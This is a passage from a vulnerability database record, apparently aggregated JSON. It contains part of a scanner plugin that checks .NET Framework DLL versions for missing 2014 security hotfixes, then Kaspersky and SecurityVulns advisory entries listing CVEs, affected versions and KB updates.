hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.34238\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.36250\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # Windows 7/Server 2008 R2 SP1\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.34238\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.36250\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972107\");\nvuln += missing;\n\n########### KB2978041 ############\n# .NET Framework 4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows 8.1 RT #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\nif (dotnet_451_installed || dotnet_452_installed)\n{\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.34209\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.36213\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2978041\");\nvuln += missing;\n\n########## KB2978042 #############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows 8 #\n# Windows RT #\n# Windows Server 2012 #\n##################################\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n missing = 0;\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.34209\", 
min_version:\" 4.0.30319.18000\", path:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.36213\", min_version:\" 4.0.30319.35000\", path:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2978042\");\n vuln += missing;\n}\n\n########## KB2979568 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"dfdll.dll\", version:\"2.0.50727.4255\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979568\");\nvuln += missing;\n\n########### KB2979570 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"dfdll.dll\", version:\"2.0.50727.5488\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979570\");\nvuln += missing;\n\n\n########## KB2979571 ###########\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.6424\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# 
LDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979571\");\nvuln += missing;\n\n\n########## KB2979573 ##############\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n###################################\nmissing = 0;\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.8100\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8012\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979573\");\nvuln += missing;\n\n########### KB2979574 ############\n# .NET Framework 2.0 SP2 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"2.0.50727.3663\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979574\");\nvuln += missing;\n\n########### KB2979575 ############\n# .NET Framework 4 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n\n# Windows Server 2003 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", 
dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows Vista/Server 2008 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows 7/Server 2008 R2 SP1\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.1029\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.2048\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979575\");\nvuln += missing;\n\n########### KB2979576 ############\n# .NET Framework 4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows 8.1 RT #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\nif (dotnet_451_installed || dotnet_452_installed)\n{\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.34243\", min_version:\"4.0.30319.10000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.36255\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979576\");\nvuln += missing;\n\n########## KB2979577 #############\n# .NET Framework 
4.5/4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows RT #\n# Windows Server 2012 R2 #\n##################################\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n missing = 0;\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.34243\", min_version:\"4.0.30319.10000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.deployment.dll\", version:\"4.0.30319.36255\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979577\");\n vuln += missing;\n}\n\n########### KB2979578 ############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n # Windows Vista/Server 2008 SP2\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.34244\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.Deployment.dll\", version:\"4.0.30319.36256\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # Windows 7/Server 2008 R2 SP1\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.34244\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.Deployment.dll\", version:\"4.0.30319.36256\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979578\");\nvuln += missing;\n\n# 
Report\nif(vuln > 0)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, \"affected\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:44:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-4062", "CVE-2014-4073", "CVE-2014-0257", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-0253", "CVE-2014-0295", "CVE-2014-1806", "CVE-2014-4149", "CVE-2014-4072"], "description": "### *Detect date*:\n11/11/2014\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft .NET Framework. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security restrictions, gain privileges, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft .NET Framework version 1.0 Service Pack 3 \nMicrosoft .NET Framework version 1.1 Service Pack 1 \nMicrosoft .NET Framework version 2.0 Service Pack 2 \nMicrosoft .NET Framework versions 3.5, 3.5.1, 4, 4.5, 4.5.1\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2014-4072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4072>) \n[CVE-2014-0257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0257>) \n[CVE-2014-0253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0253>) \n[CVE-2014-0295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0295>) \n[CVE-2014-4149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4149>) \n[CVE-2014-4122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4122>) 
\n[CVE-2014-4121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4121>) \n[CVE-2014-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4062>) \n[CVE-2014-4073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4073>) \n[CVE-2014-1806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1806>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2014-4072](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4072>)5.0Critical \n[CVE-2014-0257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0257>)9.3Critical \n[CVE-2014-0253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0253>)5.0Critical \n[CVE-2014-0295](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0295>)4.3Warning \n[CVE-2014-4149](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4149>)9.3Critical \n[CVE-2014-4122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4122>)4.3Warning \n[CVE-2014-4121](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4121>)10.0Critical \n[CVE-2014-4062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4062>)4.3Warning \n[CVE-2014-4073](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4073>)10.0Critical \n[CVE-2014-1806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1806>)10.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[2972098](<http://support.microsoft.com/kb/2972098>) \n[2898855](<http://support.microsoft.com/kb/2898855>) \n[2898856](<http://support.microsoft.com/kb/2898856>) \n[2898857](<http://support.microsoft.com/kb/2898857>) \n[2898858](<http://support.microsoft.com/kb/2898858>) \n[2979578](<http://support.microsoft.com/kb/2979578>) \n[2979575](<http://support.microsoft.com/kb/2979575>) 
\n[2979574](<http://support.microsoft.com/kb/2979574>) \n[2979577](<http://support.microsoft.com/kb/2979577>) \n[2979576](<http://support.microsoft.com/kb/2979576>) \n[2979571](<http://support.microsoft.com/kb/2979571>) \n[2979570](<http://support.microsoft.com/kb/2979570>) \n[2979573](<http://support.microsoft.com/kb/2979573>) \n[2931365](<http://support.microsoft.com/kb/2931365>) \n[2931366](<http://support.microsoft.com/kb/2931366>) \n[2931367](<http://support.microsoft.com/kb/2931367>) \n[2931368](<http://support.microsoft.com/kb/2931368>) \n[2984625](<http://support.microsoft.com/kb/2984625>) \n[2979568](<http://support.microsoft.com/kb/2979568>) \n[2904878](<http://support.microsoft.com/kb/2904878>) \n[2943344](<http://support.microsoft.com/kb/2943344>) \n[2943357](<http://support.microsoft.com/kb/2943357>) \n[3000414](<http://support.microsoft.com/kb/3000414>) \n[2972105](<http://support.microsoft.com/kb/2972105>) \n[2972107](<http://support.microsoft.com/kb/2972107>) \n[2972106](<http://support.microsoft.com/kb/2972106>) \n[2972101](<http://support.microsoft.com/kb/2972101>) \n[2972100](<http://support.microsoft.com/kb/2972100>) \n[2972103](<http://support.microsoft.com/kb/2972103>) \n[2973113](<http://support.microsoft.com/kb/2973113>) \n[2973112](<http://support.microsoft.com/kb/2973112>) \n[2973115](<http://support.microsoft.com/kb/2973115>) \n[2973114](<http://support.microsoft.com/kb/2973114>) \n[2978121](<http://support.microsoft.com/kb/2978121>) \n[2978120](<http://support.microsoft.com/kb/2978120>) \n[2978122](<http://support.microsoft.com/kb/2978122>) \n[2932079](<http://support.microsoft.com/kb/2932079>) \n[2978124](<http://support.microsoft.com/kb/2978124>) \n[2978127](<http://support.microsoft.com/kb/2978127>) \n[2978126](<http://support.microsoft.com/kb/2978126>) \n[2978128](<http://support.microsoft.com/kb/2978128>) \n[2990931](<http://support.microsoft.com/kb/2990931>) \n[2972215](<http://support.microsoft.com/kb/2972215>) 
\n[2972214](<http://support.microsoft.com/kb/2972214>) \n[2972216](<http://support.microsoft.com/kb/2972216>) \n[2972211](<http://support.microsoft.com/kb/2972211>) \n[2972213](<http://support.microsoft.com/kb/2972213>) \n[2972212](<http://support.microsoft.com/kb/2972212>) \n[2974268](<http://support.microsoft.com/kb/2974268>) \n[2974269](<http://support.microsoft.com/kb/2974269>) \n[2958732](<http://support.microsoft.com/kb/2958732>) \n[2901128](<http://support.microsoft.com/kb/2901128>) \n[2901125](<http://support.microsoft.com/kb/2901125>) \n[2901127](<http://support.microsoft.com/kb/2901127>) \n[2901126](<http://support.microsoft.com/kb/2901126>) \n[2901120](<http://support.microsoft.com/kb/2901120>) \n[3005210](<http://support.microsoft.com/kb/3005210>) \n[2931356](<http://support.microsoft.com/kb/2931356>) \n[2972207](<http://support.microsoft.com/kb/2972207>) \n[2916607](<http://support.microsoft.com/kb/2916607>) \n[2968296](<http://support.microsoft.com/kb/2968296>) \n[2898868](<http://support.microsoft.com/kb/2898868>) \n[2968294](<http://support.microsoft.com/kb/2968294>) \n[2968295](<http://support.microsoft.com/kb/2968295>) \n[2968292](<http://support.microsoft.com/kb/2968292>) \n[2977766](<http://support.microsoft.com/kb/2977766>) \n[2898860](<http://support.microsoft.com/kb/2898860>) \n[2977765](<http://support.microsoft.com/kb/2977765>) \n[2898865](<http://support.microsoft.com/kb/2898865>) \n[2898864](<http://support.microsoft.com/kb/2898864>) \n[2898866](<http://support.microsoft.com/kb/2898866>) \n[2931358](<http://support.microsoft.com/kb/2931358>) \n[2911502](<http://support.microsoft.com/kb/2911502>) \n[2931354](<http://support.microsoft.com/kb/2931354>) \n[2931357](<http://support.microsoft.com/kb/2931357>) \n[2911501](<http://support.microsoft.com/kb/2911501>) \n[2931352](<http://support.microsoft.com/kb/2931352>) \n[2898869](<http://support.microsoft.com/kb/2898869>) \n[2898870](<http://support.microsoft.com/kb/2898870>) 
\n[2898871](<http://support.microsoft.com/kb/2898871>) \n[2978114](<http://support.microsoft.com/kb/2978114>) \n[2978116](<http://support.microsoft.com/kb/2978116>) \n[2937608](<http://support.microsoft.com/kb/2937608>) \n[2978125](<http://support.microsoft.com/kb/2978125>) \n[2966828](<http://support.microsoft.com/kb/2966828>) \n[2966827](<http://support.microsoft.com/kb/2966827>) \n[2966826](<http://support.microsoft.com/kb/2966826>) \n[2966825](<http://support.microsoft.com/kb/2966825>) \n[2978042](<http://support.microsoft.com/kb/2978042>) \n[2901115](<http://support.microsoft.com/kb/2901115>) \n[2978041](<http://support.microsoft.com/kb/2978041>) \n[2901110](<http://support.microsoft.com/kb/2901110>) \n[2901111](<http://support.microsoft.com/kb/2901111>) \n[2901112](<http://support.microsoft.com/kb/2901112>) \n[2901113](<http://support.microsoft.com/kb/2901113>) \n[2901118](<http://support.microsoft.com/kb/2901118>) \n[2901119](<http://support.microsoft.com/kb/2901119>) \n[2937610](<http://support.microsoft.com/kb/2937610>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2014-11-11T00:00:00", "id": "KLA10603", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10603", "title": "KLA10603 Multiple vulnerabilities in Microsoft .NET Framework", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-4133", "CVE-2014-4073", "CVE-2014-4140", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-4127", "CVE-2014-4138", "CVE-2014-4130", "CVE-2014-4141", "CVE-2014-4971", "CVE-2014-4126", "CVE-2014-4137", "CVE-2014-4128", "CVE-2014-4114", "CVE-2014-4129", "CVE-2014-4113", "CVE-2014-4148", "CVE-2014-4134", "CVE-2014-4132", "CVE-2014-4075", "CVE-2014-4115"], "description": "Restrictions bypass and memory corruptions in Internet 
Explorer, .Net code execution, TrueType embedded fonts code execution, OLE code execution, message queue service and FAT32 driver privilege escalation.", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14016", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14016", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}